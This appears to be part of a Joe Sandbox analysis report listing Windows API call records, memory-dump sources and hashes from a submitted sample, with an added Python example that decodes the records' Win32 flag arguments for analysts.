                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                            • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                            • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                            • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0042CBF0,?,00000001,?,?,00000000,?,0042CC42,00000000,004513A9,00000000,004513CA,?,00000000), ref: 0042CBD3
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                            • Instruction ID: dfed850972a7f4cfed0b3d6ce6ead54829112a593105f6481b619d55be1254e6
                                                                            • Opcode Fuzzy Hash: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                            • Instruction Fuzzy Hash: 1AE06571304708BFD701EB62AC93E5EBBACD745714B914876B400A7651D5B8AE00845C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FCDC
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 4695a6fd859b23d6e05288b159f4db2c373673df207a75ef7933aba3ac402c35
                                                                            • Instruction ID: 6c681f427aec3a456f64e3edeb529b69c7e2eff4e0c15a83e21b0084e331bb23
                                                                            • Opcode Fuzzy Hash: 4695a6fd859b23d6e05288b159f4db2c373673df207a75ef7933aba3ac402c35
                                                                            • Instruction Fuzzy Hash: BCE012A53541483ED340EEAD6C42FA777DC971A755F008033B998D7341D9A19E158BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage
                                                                            • String ID:
                                                                            • API String ID: 1306739567-0
                                                                            • Opcode ID: 860b655ccada46b5013a8742cf2038536e52ba062f8b3e277fa769ce81e13b95
                                                                            • Instruction ID: 7c82c80d86496392c3130c3e7de8882f0dfcc9e316fc406f93a4df2216b263d5
                                                                            • Opcode Fuzzy Hash: 860b655ccada46b5013a8742cf2038536e52ba062f8b3e277fa769ce81e13b95
                                                                            • Instruction Fuzzy Hash: 21E026617843112AF23514567C83B7F1A4E83C0B04FE4842B7B00DE3C3DAAEAD09429E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,004235EC,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 00406329
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                            • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                            • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                            • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 4676b834bccda8ccd94f8a4f379db04665fbdc7bc7b85aab9c145464b6c6dbba
                                                                            • Instruction ID: 5aa87c08ff8936fcaaa84cf50ff31e6a06e3de0a8084b04fc6442f63f77fe161
                                                                            • Opcode Fuzzy Hash: 4676b834bccda8ccd94f8a4f379db04665fbdc7bc7b85aab9c145464b6c6dbba
                                                                            • Instruction Fuzzy Hash: BDE07EB2600129AF9B40DE8DDC81EEB37ADAB1D350F404016FA08D7200C2B4EC519BB4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindClose.KERNEL32(00000000,000000FF,0046C394,00000000,0046D18D,?,00000000,0046D1D6,?,00000000,0046D30F,?,00000000,?,00000000), ref: 0045344E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            • Opcode ID: 427228486256767e00faf75f55361d34339d0a4a5d8c678e4eed14c482ba6ac9
                                                                            • Instruction ID: f2f8a632f0a2160e68271c263a111a4b86933883cadac8f3c7310e18fb689ea2
                                                                            • Opcode Fuzzy Hash: 427228486256767e00faf75f55361d34339d0a4a5d8c678e4eed14c482ba6ac9
                                                                            • Instruction Fuzzy Hash: A3E065B05046008BDB15DF3A848025676D15F89321F14C56AAC58CB3A6D63C840A8A56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(0048F91E,?,0048F940,?,?,00000000,0048F91E,?,?), ref: 0041460B
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
• Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
• Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
• Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406E8C
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: f93223040538cb60598dc4cf3010d2a684b40fa1b5059103e17c9242f0e749d0
• Instruction ID: 5e9ef0cb41ef517b54198f539e7e4457f1ce254f1207c5e451c0fee893fabf4d
• Opcode Fuzzy Hash: f93223040538cb60598dc4cf3010d2a684b40fa1b5059103e17c9242f0e749d0
• Instruction Fuzzy Hash: 3DD05B763082107AD620A55BAC44DA76BDCCFC5770F11063EB558C71C1D6309C01C675
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00423568: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042357D
• ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
  • Part of subcall function 00423598: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 004235B4
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: InfoParametersSystem$ShowWindow
• String ID:
• API String ID: 3202724764-0
• Opcode ID: 5af24b6df55da37d4c3611fee004674b9993ece864ba4c629d2fd79d04b893e1
• Instruction ID: 6e8deb3ed7ffb4c54c7bf11bddd21d475954711d807402a63cfbe74293682e9f
• Opcode Fuzzy Hash: 5af24b6df55da37d4c3611fee004674b9993ece864ba4c629d2fd79d04b893e1
• Instruction Fuzzy Hash: 03D05E123812743102107ABB280998B42A84D862AB388043BB54CDB202E91E8A81A1AC
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetWindowTextA.USER32(?,00000000), ref: 0042424C
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
• Opcode ID: c34688b727229efcedc1f2997f44e421d28f5fd8d0fc977b3f59e8ef08dab085
• Instruction ID: a3b20f4c882213fa23ff33249cd178fa67041ba6f44abe22b1f00704e939aabb
• Opcode Fuzzy Hash: c34688b727229efcedc1f2997f44e421d28f5fd8d0fc977b3f59e8ef08dab085
• Instruction Fuzzy Hash: 4CD05EE27011702BCB01BBED54C4AC667CC8B8829AB1940BBF918EF257C638CE448398
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00450A53,00000000), ref: 0042CC0B
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
• Instruction ID: 3d474633da5dc292dd1e9b08acfa0ea7ef8e6560f0837aa6ac70ccb6d2902417
• Opcode Fuzzy Hash: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
• Instruction Fuzzy Hash: 42C08CE03022001A9A1465BF2CC511F42C8891827A3A41F37F53CE32D2D27E88A72428
Uniqueness

Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00463C58,00000000,00000000,00000000,0000000C,00000000), ref: 00463004
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
• Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
• Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
• Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A834,0040CDE0,?,00000000,?), ref: 00406E45
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: e13d03deedc56d39d84402585b6acf1c1ff9e47572f9c80b557e16e39ce6cc42
• Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
• Opcode Fuzzy Hash: e13d03deedc56d39d84402585b6acf1c1ff9e47572f9c80b557e16e39ce6cc42
• Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
Uniqueness

Uniqueness Score: -1.00%
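The argument lists in these records are raw hex, which hides the security-relevant detail: the CreateFileA call above opens its target with GENERIC_READ|GENERIC_WRITE, no sharing, CREATE_ALWAYS and FILE_ATTRIBUTE_NORMAL, and the VirtualAlloc record further down on this page commits PAGE_READWRITE (not executable) memory. The following Python is an added example, not part of the Joe Sandbox report and not the sandbox's own tooling: it parses API lines copied from this page's records into structured calls and decodes the numeric arguments into their documented Win32 flag names. Assumptions: the regular expression targets the "• Name.MODULE(args), ref: addr" line layout exactly as shown on this page; values beyond an API prototype's parameter count are treated as caller stack contents that the sandbox dumps alongside the real arguments (so only the leading prototype slots are decoded); "?" marks an argument the sandbox could not resolve and is kept as None; the constant tables are the standard Win32 values.

```python
"""Decode Win32 argument constants from Joe Sandbox "APIs" lines.

Added example for reading the function records on this page; not Joe Sandbox
code. Only the leading prototype parameters of each call are interpreted;
trailing values are assumed to be dumped caller stack slots.
"""
import re
from typing import Dict, List, Optional

# Constructed sample: four API lines copied verbatim from records on this page.
SAMPLE_RECORDS = """\
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A834,0040CDE0,?,00000000,?), ref: 00406E45
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0045C020
• ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
• SetErrorMode.KERNEL32(?,0042E269), ref: 0042E25C
"""

# Matches "• Name.MODULE(arg,arg,...), ref: ADDR" (assumed report layout).
CALL_RE = re.compile(r"•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]{8})")

# Standard Win32 constants (winnt.h / fileapi.h / memoryapi.h / winuser.h).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRIBUTES = {0x02: "FILE_ATTRIBUTE_HIDDEN", 0x04: "FILE_ATTRIBUTE_SYSTEM",
                   0x80: "FILE_ATTRIBUTE_NORMAL", 0x100: "FILE_ATTRIBUTE_TEMPORARY"}
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
SHOW_WINDOW = {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 5: "SW_SHOW", 6: "SW_MINIMIZE",
               9: "SW_RESTORE"}


def parse_calls(text: str) -> List[dict]:
    """Turn each API line into {'api', 'module', 'args', 'ref'}; '?' -> None."""
    calls = []
    for name, module, raw_args, ref in CALL_RE.findall(text):
        args: List[Optional[int]] = []
        for a in raw_args.split(",") if raw_args.strip() else []:
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
        calls.append({"api": name, "module": module, "args": args,
                      "ref": int(ref, 16)})
    return calls


def flags(value: Optional[int], table: Dict[int, str]) -> str:
    """Render a bit mask as 'A|B', keeping unknown bits as hex."""
    if value is None:
        return "?"
    if value == 0:
        return "0"
    names = [n for bit, n in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(f"{value & ~known:#x}")
    return "|".join(names)


def enum(value: Optional[int], table: Dict[int, str]) -> str:
    """Render a single-valued enum argument, falling back to hex."""
    if value is None:
        return "?"
    return table.get(value, f"{value:#x}")


def decode(call: dict) -> Dict[str, str]:
    """Decode the prototype parameters we know for the APIs in the sample."""
    a, api = call["args"], call["api"]
    if api == "CreateFileA" and len(a) >= 7:
        return {"dwDesiredAccess": flags(a[1], GENERIC_ACCESS),
                "dwShareMode": "0 (no sharing)" if a[2] == 0 else flags(a[2], {}),
                "dwCreationDisposition": enum(a[4], CREATION_DISPOSITION),
                "dwFlagsAndAttributes": flags(a[5], FILE_ATTRIBUTES)}
    if api == "VirtualAlloc" and len(a) >= 4:
        # Any PAGE_EXECUTE* protection (0x10..0x80) is what unpackers need.
        executable = a[3] is not None and bool(a[3] & 0xF0)
        return {"flAllocationType": flags(a[2], ALLOC_TYPE),
                "flProtect": enum(a[3], PAGE_PROTECT),
                "executable": str(executable)}
    if api == "ShowWindow" and len(a) >= 2:
        return {"nCmdShow": enum(a[1], SHOW_WINDOW)}
    return {}


if __name__ == "__main__":
    for call in parse_calls(SAMPLE_RECORDS):
        print(f"{call['api']:<14} @ {call['ref']:08X}", decode(call))
```

Running the block prints one decoded line per call; calls with no decoder (SetErrorMode here) come out as an empty map rather than a guess. Extending it to other records on this page means adding a prototype-aware branch in decode, since the positional meaning of each slot depends on the API.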

APIs
• SetCurrentDirectoryA.KERNEL32(00000000,?,00491C72,00000000,00491E45,?,?,00000005,00000000,00491E79,?,?,00000000), ref: 0040721B
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
• Opcode ID: 116f646fca034a371e6a5c157b9d4efecc0deabf7e2bcd6bcee3aaaef58023bf
• Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
• Opcode Fuzzy Hash: 116f646fca034a371e6a5c157b9d4efecc0deabf7e2bcd6bcee3aaaef58023bf
• Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
  • Part of subcall function 0044FB8C: GetLastError.KERNEL32(0044F9A8,0044FC4E,?,00000000,?,00491CE4,00000001,00000000,00000002,00000000,00491E45,?,?,00000005,00000000,00491E79), ref: 0044FB8F
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
• Opcode ID: 2e48029344297d65debf6e871ad896209e8586a13361bc78737a523636087be7
• Instruction ID: c068c6aabe38557252dbc7cfbc7370f277f9ebc01c0ea26a9f887d834500d39f
• Opcode Fuzzy Hash: 2e48029344297d65debf6e871ad896209e8586a13361bc78737a523636087be7
• Instruction Fuzzy Hash: 2CC04CA130050047DF11A6AED5C190763D89E4D2163544176B504CF217D668D8184A14
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(?,0042E269), ref: 0042E25C
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 7fad5ebe009d69c2099675b3e000f1c062c351dec5b4fb3cd432c824ae70c241
• Instruction ID: b0804e078831a813d9aa2463563e291fc03c9a68ee142e2bda9a21ea894dad8b
• Opcode Fuzzy Hash: 7fad5ebe009d69c2099675b3e000f1c062c351dec5b4fb3cd432c824ae70c241
• Instruction Fuzzy Hash: AFB09B7670C600DDB709D6D6745552D63D8D7C47207E145B7F001D2580D93C58004928
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
• Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
• Opcode Fuzzy Hash: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
• Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1f2ac44561df58c1130f0e00043173dc2e2ecdcc2ac39e257b7ae57b123e96e8
• Instruction ID: 3d9dac49d769706550815f3fb3cd696203b03cba94e1f0501d82b18e9078b8ff
• Opcode Fuzzy Hash: 1f2ac44561df58c1130f0e00043173dc2e2ecdcc2ac39e257b7ae57b123e96e8
• Instruction Fuzzy Hash: 7A517770E041499FEB00EFA9C882AAEBBF5EB45314F51416BE504A7351DB389D46CB98
Uniqueness

Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0045C020
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
